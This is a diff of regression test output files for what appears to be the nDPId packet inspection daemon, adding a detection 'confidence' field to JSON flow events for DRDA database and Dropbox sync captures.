-00654{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DRDA","breed":"Acceptable","category":"Database"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
+00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 38/38
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597979 bytes
-~~ total memory freed........: 4597979 bytes
-~~ total allocations/frees...: 99592/99592
+~~ total memory allocated....: 4682932 bytes
+~~ total memory freed........: 4682932 bytes
+~~ total allocations/frees...: 101182/101182
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 659 chars
-~~ json string avg len.......: 470 chars
+~~ json string max len.......: 685 chars
+~~ json string avg len.......: 482 chars
diff --git a/test/results/dropbox.pcap.out b/test/results/dropbox.pcap.out
index 8687186e2..506e65ae9 100644
--- a/test/results/dropbox.pcap.out
+++ b/test/results/dropbox.pcap.out
@@ -1,102 +1,102 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dropbox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="}
 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":180000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":180000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="}
 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":180000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1459182796665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1459182796665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"}
